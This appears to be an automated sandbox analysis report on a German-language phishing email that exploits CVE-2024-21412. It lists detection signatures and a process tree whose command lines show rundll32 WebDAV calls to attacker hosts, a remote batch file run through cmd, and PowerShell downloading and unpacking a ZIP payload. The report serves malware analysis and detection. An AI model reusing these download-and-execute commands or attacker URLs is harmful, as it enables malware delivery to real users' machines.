Edit tour
Windows
Analysis Report
EXTERN Zahlungsbest#U00e4tigung.msg
Overview
General Information
Sample name: | EXTERN Zahlungsbest#U00e4tigung.msgrenamed because original name is a hash value |
Original sample name: | EXTERN Zahlungsbesttigung.msg |
Analysis ID: | 1484680 |
MD5: | c5b5b77587dc74ae4ec2f8b65567fbea |
SHA1: | 3de09091c51e128b3b524547c3a8c85d0e3a7c08 |
SHA256: | 679d02840a8f742969bd78e18e80cd98f5844ff4460d01b889972ed395377f7d |
Infos: | |
Detection
CVE-2024-21412
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Sigma detected: rundll32 run dll from internet
Yara detected CVE-2024-21412
AI detected suspicious e-Mail
Chrome launches external ms-search protocol handler (WebDAV)
Connects to many ports of the same IP (likely port scanning)
Loading BitLocker PowerShell Module
Opens network shares
Powershell drops PE file
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Yara signature match
Classification
- System is w10x64_ra
- OUTLOOK.EXE (PID: 7112 cmdline:
"C:\Progra m Files (x 86)\Micros oft Office \Root\Offi ce16\OUTLO OK.EXE" /f "C:\Users \user\Desk top\EXTERN Zahlungsb est#U00e4t igung.msg" MD5: 91A5292942864110ED734005B7E005C0) - ai.exe (PID: 1224 cmdline:
"C:\Progra m Files (x 86)\Micros oft Office \root\vfs\ ProgramFil esCommonX6 4\Microsof t Shared\O ffice16\ai .exe" "EA7 8F63D-11D0 -470A-A737 -D7B520A02 F95" "4CE9 D7BA-5FF5- 4189-92A5- D6CD5249FA 96" "7112" "C:\Progr am Files ( x86)\Micro soft Offic e\Root\Off ice16\OUTL OOK.EXE" " WordCombin edFloatieL reOnline.o nnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD) - chrome.exe (PID: 6656 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t C:\Users \user\AppD ata\Local\ Microsoft\ Windows\IN etCache\Co ntent.Outl ook\2SB9ML RC\Rechnun g Nr. 1773 5360.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 6936 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2180 --fi eld-trial- handle=192 4,i,120673 9737266806 8014,31309 5721925182 3397,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- svchost.exe (PID: 6192 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- rundll32.exe (PID: 8072 cmdline:
rundll32.e xe C:\Wind ows\system 32\davclnt .dll,DavSe tCookie st ring-neura l-inspirat ion-polo.t rycloudfla re.com@SSL https://s tring-neur al-inspira tion-polo. trycloudfl are.com/ MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 8128 cmdline:
rundll32.e xe C:\Wind ows\system 32\davclnt .dll,DavSe tCookie st ring-neura l-inspirat ion-polo.t rycloudfla re.com@SSL https://s tring-neur al-inspira tion-polo. trycloudfl are.com/ MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 7392 cmdline:
rundll32.e xe C:\Wind ows\system 32\davclnt .dll,DavSe tCookie st ring-neura l-inspirat ion-polo.t rycloudfla re.com@SSL https://s tring-neur al-inspira tion-polo. trycloudfl are.com/E_ SCAN_DOC MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 3312 cmdline:
rundll32.e xe C:\Wind ows\system 32\davclnt .dll,DavSe tCookie bu rrkeklprin ting.tech@ 4098 http: //burrkekl printing.t ech:4098/n ew.bat MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 4020 cmdline:
rundll32.e xe C:\Wind ows\system 32\davclnt .dll,DavSe tCookie bu rrkeklprin ting.tech@ 4098 http: //burrkekl printing.t ech:4098/n ew.bat MD5: EF3179D498793BF4234F708D3BE28633)
- cmd.exe (PID: 7896 cmdline:
C:\Windows \system32\ cmd.exe /c \\burrkek lprinting. tech@4098\ DavWWWRoot \new.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - timeout.exe (PID: 936 cmdline:
timeout /t 5 REM Wa it for PDF to open ( adjust tim eout as ne eded) MD5: 100065E21CFBBDE57CBA2838921F84D6) - powershell.exe (PID: 7940 cmdline:
powershell -Command "& { [Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; Invo ke-WebRequ est -Uri ' http://bur rkeklprint ing.tech:7 119/DXJS.z ip' -OutFi le 'C:\Use rs\user\Do wnloads\DX JS.zip' }" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 3616 cmdline:
powershell -Command "& { Expan d-Archive -Path 'C:\ Users\user \Downloads \DXJS.zip' -Destinat ionPath 'C :\Users\us er\Downloa ds' -Force }" MD5: 04029E121A0CFA5991749937DD22A1D9)
- rundll32.exe (PID: 7848 cmdline:
C:\Windows \System32\ rundll32.e xe C:\Wind ows\System 32\shell32 .dll,SHCre ateLocalSe rverRunDll {9aa46009 -3ce0-458a -a354-7156 10a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
- OpenWith.exe (PID: 876 cmdline:
C:\Windows \system32\ OpenWith.e xe -Embedd ing MD5: E4A834784FA08C17D47A1E72429C5109) - Acrobat.exe (PID: 1976 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \Downloads \E_TAX_DOC 4380935627 8987334567 2_pdf.down load" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 6620 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 1164 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=22 72 --field -trial-han dle=1576,i ,140174527 7560041960 ,613599763 6573201547 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- rundll32.exe (PID: 408 cmdline:
rundll32.e xe C:\Wind ows\system 32\davclnt .dll,DavSe tCookie bu rrkeklprin ting.tech@ 4098 http: //burrkekl printing.t ech:4098/n ew.bat MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 1308 cmdline:
rundll32.e xe C:\Wind ows\system 32\davclnt .dll,DavSe tCookie bu rrkeklprin ting.tech@ 4098 http: //burrkekl printing.t ech:4098/n ew.bat MD5: EF3179D498793BF4234F708D3BE28633)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CVE_2024_21412 | Yara detected CVE-2024-21412 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CVE_2024_21412 | Yara detected CVE-2024-21412 | Joe Security | ||
JoeSecurity_CVE_2024_21412 | Yara detected CVE-2024-21412 | Joe Security | ||
JoeSecurity_CVE_2024_21412 | Yara detected CVE-2024-21412 | Joe Security | ||
JoeSecurity_CVE_2024_21412 | Yara detected CVE-2024-21412 | Joe Security | ||
JoeSecurity_CVE_2024_21412 | Yara detected CVE-2024-21412 | Joe Security | ||
Click to see the 2 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CVE_2024_21412 | Yara detected CVE-2024-21412 | Joe Security |
System Summary |
---|
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Software Vulnerabilities |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Networking |
---|
Source: | TCP traffic: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | TCP traffic: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |